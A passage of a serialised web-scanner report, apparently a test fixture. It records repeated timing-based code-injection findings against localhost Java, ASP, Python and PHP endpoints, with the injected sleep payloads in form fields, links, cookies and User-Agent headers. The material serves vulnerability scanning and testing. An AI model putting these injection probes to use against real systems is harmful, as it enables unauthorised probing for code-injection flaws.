a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/java/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && Thread.sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' && Thread.sleep(16000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && Thread.sleep(16000);'
:injected: ! ' && Thread.sleep(16000);'
:combo:
User-Agent: ! ' && Thread.sleep(16000);'
:action: http://localhost:14309/java/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/java/header/straight
injected: ! ' && Thread.sleep(16000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && Thread.sleep(16000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/asp/form/straight
elem: form
method: POST
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' Thread.Sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' Thread.Sleep(16000);'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' Thread.Sleep(16000);'
:follow_location: true
:injected: ! ' Thread.Sleep(16000);'
:combo:
!binary "aW5wdXQ=": ! ' Thread.Sleep(16000);'
:action: http://localhost:14309/asp/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/asp/form/straight
injected: ! ' Thread.Sleep(16000);'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/asp/link/straight?input=default
elem: link
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' Thread.Sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' Thread.Sleep(16000);'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' Thread.Sleep(16000);'
:follow_location: true
:injected: ! ' Thread.Sleep(16000);'
:combo:
!binary "aW5wdXQ=": ! ' Thread.Sleep(16000);'
:action: http://localhost:14309/asp/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/asp/link/straight?input=default
injected: ! ' Thread.Sleep(16000);'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:14309/asp/cookie/straight
elem: cookie
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' Thread.Sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' Thread.Sleep(16000);'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' Thread.Sleep(16000);'
:injected: ! ' Thread.Sleep(16000);'
:combo:
!binary "Y29va2ll": ! ' Thread.Sleep(16000);'
:action: http://localhost:14309/asp/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:14309/asp/cookie/straight
injected: ! ' Thread.Sleep(16000);'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=++Thread.Sleep(16000)%3B
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/asp/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && Thread.Sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' && Thread.Sleep(16000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && Thread.Sleep(16000);'
:injected: ! ' && Thread.Sleep(16000);'
:combo:
User-Agent: ! ' && Thread.Sleep(16000);'
:action: http://localhost:14309/asp/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/asp/header/straight
injected: ! ' && Thread.Sleep(16000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && Thread.Sleep(16000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/python/form/straight
elem: form
method: POST
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' import time;time.sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' import time;time.sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);'
:follow_location: true
:injected: ! ' import time;time.sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);'
:action: http://localhost:14309/python/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/python/form/straight
injected: ! ' import time;time.sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/python/link/straight?input=default
elem: link
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' import time;time.sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' import time;time.sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);'
:follow_location: true
:injected: ! ' import time;time.sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' import time;time.sleep(16000/1000);'
:action: http://localhost:14309/python/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/python/link/straight?input=default
injected: ! ' import time;time.sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:14309/python/cookie/straight
elem: cookie
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' import time;time.sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' import time;time.sleep(16000/1000);'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' import time;time.sleep(16000/1000);'
:injected: ! ' import time;time.sleep(16000/1000);'
:combo:
!binary "Y29va2ll": ! ' import time;time.sleep(16000/1000);'
:action: http://localhost:14309/python/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:14309/python/cookie/straight
injected: ! ' import time;time.sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=++import+time%3Btime.sleep(16000/1000)%3B
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/python/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && import time;time.sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' && import time;time.sleep(16000/1000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && import time;time.sleep(16000/1000);'
:injected: ! ' && import time;time.sleep(16000/1000);'
:combo:
User-Agent: ! ' && import time;time.sleep(16000/1000);'
:action: http://localhost:14309/python/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/python/header/straight
injected: ! ' && import time;time.sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && import time;time.sleep(16000/1000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/php/form/straight
elem: form
method: POST
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:follow_location: true
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:action: http://localhost:14309/php/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/php/form/straight
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
